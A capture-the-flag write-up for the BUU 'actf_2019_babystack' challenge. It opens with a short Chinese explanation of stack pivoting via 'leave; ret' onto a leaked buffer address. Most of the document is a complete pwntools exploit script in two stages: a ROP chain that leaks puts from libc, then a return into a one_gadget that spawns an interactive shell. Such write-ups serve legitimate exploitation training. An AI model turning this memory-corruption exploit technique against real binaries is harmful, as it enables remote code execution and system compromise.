BUU-actf_2019_babystack-WP
一道简单的栈迁移题：读入长度只够覆盖到返回地址，放不下完整的 ROP 链，于是利用 `leave; ret` 把 rsp 迁移到程序泄露出的栈缓冲区地址上，在那里执行更长的 ROP 链。
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
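# ---- gadgets / constants (from the challenge binary and its environment) ----
pop_rdi_ret = 0x400ad3     # pop rdi; ret
leave_ret = 0x400A18       # leave; ret -- the pivot gadget (moves rsp onto our buffer)
ret_after_leak = 0x400800  # where stage 1 returns so the program runs again; presumably main/_start -- TODO confirm in the disassembly
READ_LEN = 0xE0            # count we answer the length prompt with: 0xD0 buffer + 8 saved rbp + 8 return address
ONE_GADGET = 0x10a38c      # one_gadget offset; must belong to the same libc build whose puts offset is used for `base`
context(log_level='debug')

# `python exp.py LOCAL` runs against the local binary, otherwise the BUU instance.
if args.LOCAL:
    sh = process("./ACTF_2019_babystack")
else:
    sh = remote("node3.buuoj.cn", 28568)
elf = ELF("./ACTF_2019_babystack")
# NOTE(review): this ELF is loaded but `base` below comes from LibcSearcher;
# if the remote libc is really this 2.23 build, use libc.symbols["puts"]
# instead and re-derive ONE_GADGET from this file with one_gadget.
libc = ELF("./buu-libc-2.23.so")


def leak_stack():
    """Answer the length prompt with READ_LEN and return the buffer address the program prints after 'at '."""
    sh.sendlineafter(b"e?\n>", str(READ_LEN).encode())
    sh.recvuntil(b"at ")
    return int(sh.recvuntil(b"\n", drop=True), 16)


def send_payload(payload):
    """Send one message, refusing anything longer than the READ_LEN we asked the program to read."""
    if len(payload) > READ_LEN:
        raise ValueError("payload is %d bytes, program reads only %d" % (len(payload), READ_LEN))
    sh.sendafter(b">", payload)


# ---- stage 1: pivot onto the buffer and leak puts@libc ----
stack_addr = leak_stack()
# Memory at stack_addr, as seen once the second `leave` has set rsp = stack_addr:
#   +0x00  value popped into rbp by that `leave` (anything)
#   +0x08  pop rdi; ret
#   +0x10  puts@got        -> rdi
#   +0x18  puts@plt        -> prints the libc address of puts
#   +0x20  ret_after_leak  -> back into the program for stage 2
chain = b"fillfill"
chain += p64(pop_rdi_ret) + p64(elf.got["puts"])
chain += p64(elf.symbols["puts"]) + p64(ret_after_leak)
payload = chain.ljust(0xD0, b"a")   # pad out the rest of the 0xD0 buffer
payload += p64(stack_addr)          # saved rbp: the function's own `leave` loads this into rbp
payload += p64(leave_ret)           # return address: second `leave` then does rsp = rbp = stack_addr
send_payload(payload)

sh.recvuntil(b"e~\n")
# puts stops at the first NUL byte, so the address typically comes back as 6 bytes; pad to 8 for u64.
puts_addr = u64(sh.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
LIBC = LibcSearcher("puts", puts_addr)
base = puts_addr - LIBC.dump("puts")
# Cheap sanity check before trusting the leak: libc is mapped page-aligned, so a
# wrong libc candidate or a garbled leak shows up as non-zero low 12 bits.
if base & 0xfff:
    log.error("libc base %#x is not page aligned; leak %#x or chosen libc is wrong" % (base, puts_addr))
log.success("libc base = %#x" % base)

# ---- stage 2: plain ret2one_gadget, no pivot needed this time ----
leak_stack()   # the program prints the buffer address again; not needed now, just consumed to stay in sync
payload = b"a" * 0xD8                # 0xD0 buffer + 8-byte saved rbp
payload += p64(base + ONE_GADGET)    # return address -> one_gadget
send_payload(payload)
sh.interactive()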
和此题类似